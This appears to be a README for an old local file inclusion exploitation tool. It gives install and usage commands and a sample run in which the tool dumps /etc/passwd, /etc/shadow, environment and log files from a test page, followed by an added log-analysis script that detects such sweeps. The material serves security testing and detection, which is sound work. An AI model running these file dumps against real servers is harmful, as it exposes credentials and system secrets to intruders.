Simple-Local-File-Inclusion-Exploiter


Description

Simple Local File Inclusion Exploiter is a Python script that checks whether a page is vulnerable to Local File Inclusion (LFI) attacks.

Installation

$ mkdir -p /pentest/web/lfi-sploiter/
$ cd /pentest/web/lfi-sploiter/
$ wget http://packetstorm.linuxsecurity.com/UNIX/scanners/lfi_sploiter.py.txt
$ mv lfi_sploiter.py.txt lfi_sploiter.py

Usage

Syntax

$ python lfi_sploiter.py \
--exploit-url="<http://url>" \
--vulnerable-parameter="<parameter>"

Options

Both options are mandatory:

--exploit-url="<url>"
URL to exploit (e.g. --exploit-url="http://192.168.1.1/index.php?page=1")
--vulnerable-parameter="<param>"
Name of the parameter to exploit (e.g. --vulnerable-parameter="page")

Example

The following example is a proof of concept tested against a specific piece of vulnerable code, which you can download here.

$ python lfi_sploiter.py --exploit-url="http://localhost/poc/LFI/index.php?page=1" \
--vulnerable-parameter="page"

Simple Local File Inclusion Exploiter
by Valentin Hoebel (valentin ( a t ) xenuser ( d o t ) org)

Version 1.0 (21th November 2010)  ^__^
                                  (oo)\________
                                  (__)\        )\/\ 
                                      ||----w |
Power to teh cows!                    ||     ||
____________________________________________________

[i] Provided URL to exploit: http://localhost/poc/LFI/index.php?page=1
[i] Provided vulnerable parameter: page

[i] Assuming the provided data was correct.
[i] Trying to establish a connection with a random user agent...
[i] Connected to target! URL seems to be valid.
[i] Jumping to the exploit feature.

[i] For exploiting the LFI vulnerability we need to split the URL into its parts.
[i] IP address / domain: localhost
[i] Script: /poc/LFI/index.php
[i] URL query string: page=1

[i] It seems that the URL contains at least one parameter.
[i] Trying to find also other parameters...
[i] No other parameters were found.
[i] The following 1 parameter(s) was/were found:
[i] {'page': '1'}

[i] According to you, the vulnerable parameter should be: page
[i] Checking if this parameter exists in the provided URL...
[i] Found your vulnerable parameter in the URL.

[i] Now trying to find out how this LFI vulnerability can be exploited...
[i] This can take a while.
[+] Found signs of a successfull LFI vulnerability! No nullbyte was required.
[+] URL: http://localhost/poc/LFI/index.php?page=/etc/passwd

[i] Exploiting the LFI vulnerability starts right now.
[i] Trying to dump some interesting files to your local hard disk...
[+] Dumping file: /etc/passwd
[+] Dumping file: /proc/self/environ
[+] Dumping file: /var/log/apache2/access.log
[+] Dumping file: /var/log/apache2/error.log
[+] Dumping file: /etc/shadow
[+] Dumping file: /etc/group
[+] Dumping file: /var/log/auth.log
[+] Dumping file: /proc/self/status
[+] Dumping file: /proc/self/mounts
[+] Dumping file: /proc/cpuinfo
[+] Dumping file: /proc/meminfo
[i] Hint: The files are also dumped when we have no permission to view them.
[i] Instead of the file, the PHP error message will be dumped.

[i] Completed the task. Will now exit!
[i] I know, there is more about LFI than it is covered here, but this will be implemented in later versions of this tool.
[i] Feel free to send in some feedback!
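
On the server side, the run above shows up in the web server's access log as one client requesting many sensitive files through the same parameter. The following Python detection sketch is an added example, not part of the tool or of the original page; it flags that pattern in Apache access-log lines. The sample log lines, the client addresses, the threshold and the function names are constructed for illustration, and the null-byte and ../ normalisation generalises slightly beyond the run shown.

```python
import re
from collections import defaultdict
from urllib.parse import parse_qsl, urlsplit

# Files the tool reports dumping in the run shown above.
DUMPED_FILES = {
    "/etc/passwd", "/proc/self/environ", "/var/log/apache2/access.log",
    "/var/log/apache2/error.log", "/etc/shadow", "/etc/group",
    "/var/log/auth.log", "/proc/self/status", "/proc/self/mounts",
    "/proc/cpuinfo", "/proc/meminfo",
}
# Apache common/combined log format: client address, timestamp, request line.
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST|HEAD) (\S+) [^"]*"')

# Constructed sample log lines (documentation addresses), not real traffic.
SAMPLE_LOG = """\
203.0.113.7 - - [21/Nov/2010:10:00:01 +0000] "GET /poc/LFI/index.php?page=1 HTTP/1.1" 200 512
203.0.113.7 - - [21/Nov/2010:10:00:02 +0000] "GET /poc/LFI/index.php?page=/etc/passwd HTTP/1.1" 200 1804
203.0.113.7 - - [21/Nov/2010:10:00:03 +0000] "GET /poc/LFI/index.php?page=/proc/self/environ HTTP/1.1" 200 640
203.0.113.7 - - [21/Nov/2010:10:00:03 +0000] "GET /poc/LFI/index.php?page=..%2F..%2Fetc%2Fshadow%00 HTTP/1.1" 200 230
198.51.100.9 - - [21/Nov/2010:10:05:00 +0000] "GET /poc/LFI/index.php?page=about HTTP/1.1" 200 900
198.51.100.9 - - [21/Nov/2010:10:05:09 +0000] "GET /docs/view.php?file=/etc/group HTTP/1.1" 404 120
""".splitlines()

def normalise(value):
    """Drop anything after a null byte and collapse a leading ../ run to /."""
    value = value.split("\x00", 1)[0]
    value = re.sub(r"^(?:\.\./)+", "/", value)
    return re.sub(r"/{2,}", "/", value)

def find_lfi_sweeps(lines, threshold=3):
    """Return {(client, script, parameter): sorted files} for every client that
    requested at least `threshold` distinct sensitive files via one parameter."""
    hits = defaultdict(set)
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a request line we understand
        client, target = m.groups()
        url = urlsplit(target)
        for param, value in parse_qsl(url.query, keep_blank_values=True):
            path = normalise(value)  # parse_qsl has already URL-decoded it
            if path in DUMPED_FILES:
                hits[(client, url.path, param)].add(path)
    return {k: sorted(v) for k, v in hits.items() if len(v) >= threshold}

if __name__ == "__main__":
    for (client, script, param), files in find_lfi_sweeps(SAMPLE_LOG).items():
        print(f"{client} swept {len(files)} files via {script}?{param}=: {files}")
```

Lowering the threshold to 1 turns the sweep detector into a per-request alert, at the cost of more noise from one-off probes.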
